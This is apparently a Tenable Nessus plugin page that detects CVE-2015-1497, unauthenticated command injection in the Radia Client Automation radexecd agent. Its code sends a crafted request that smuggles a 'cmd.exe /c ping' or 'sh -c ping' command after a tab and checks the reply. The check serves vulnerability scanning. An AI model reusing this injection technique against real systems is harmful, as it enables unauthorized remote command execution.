Persistent Systems Radia Client Automation Agent Command Injection

2015-10-1900:00:00

www.tenable.com

113

The Persistent Systems Radia Client Automation (formerly HP Client Automation) agent listening on the remote port is affected by a command execution vulnerability due to a flaw in the radexecd.exe component. An unauthenticated, remote attacker can exploit this to execute arbitrary commands in the context of the radexecd process.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(86427);
  script_version("1.9");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2015-1497");
  script_bugtraq_id(72612);
  script_xref(name:"EDB-ID", value:"36169");
  script_xref(name:"EDB-ID", value:"36206");

  script_name(english:"Persistent Systems Radia Client Automation Agent Command Injection");

  script_set_attribute(attribute:"synopsis", value:
"The Persistent Systems Radia Client Automation agent listening on the
remote port is affected by a command injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Persistent Systems Radia Client Automation (formerly HP Client
Automation) agent listening on the remote port is affected by a
command execution vulnerability due to a flaw in the radexecd.exe
component. An unauthenticated, remote attacker can exploit this to
execute arbitrary commands in the context of the radexecd process.");
  # https://support.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?56b928e5");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-15-038/");
  script_set_attribute(attribute:"solution", value:
"See the vendor advisory for a possible solution.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'HP Client Automation Command Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/10/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:persistent_systems:radia_client_automation");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:client_automation_enterprise");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.");

  script_dependencies("ovcm_notify_daemon_detect.nasl", "os_fingerprint.nasl");
  script_require_keys("Services/radexecd");
  script_exclude_keys("global_settings/supplied_logins_only");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("dump.inc");

if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

# The port for the Notify daemon (radexecd)
port = get_service(svc:'radexecd', default:3465, exit_on_fail:TRUE);

# Attack only if the detection plugin determines noauth is enabled 
# for radexecd 
if (get_kb_item("radexecd/" + port + "/noauth") != TRUE)
  exit(0, "User authentication for radexecd on port " + port + " seems to be enabled, skipping the attack.");

os = get_kb_item("Host/OS");
if(os && "windows" >< tolower(os))
{
  injected = 'cmd.exe /c ping ' + compat::this_host();
  cmd = 'hide hide"\t"' + injected;
}
# Injected command may fail if it is not available on the target 
# host, but a vulnerable server will still return '\x00' in response.
else
{
  injected = 'sh -c "ping -c 3 ' + compat::this_host() + '"';
  cmd = 'hide hide\t' + injected; 
}

s = open_sock_tcp(port);
if(!s) audit(AUDIT_SOCK_FAIL, port);

req = '\x00' +  # return port; insignificant
      'USER_' + SCRIPT_NAME + '\x00' +
      'PASS_' + SCRIPT_NAME + '\x00' +
      cmd + '\x00';

send(socket: s, data: req);
res = recv(socket: s, length:1024);
close(s);

if (isnull(res)) 
  audit(AUDIT_RESP_NOT, port, "a Notify request");

# Vulnerable
if (res == '\x00')
  security_hole(port: port);
else
  exit(0, "The service listening on port " + port + ' returned the following response, and is probably not affected.\n' + hexdump(ddata:res));

VendorProductVersionCPE
persistent_systemsradia_client_automationcpe:/a:persistent_systems:radia_client_automation
hpclient_automation_enterprisecpe:/a:hp:client_automation_enterprise

Vendor	Product	Version	CPE
persistent_systems	radia_client_automation		cpe:/a:persistent_systems:radia_client_automation
hp	client_automation_enterprise		cpe:/a:hp:client_automation_enterprise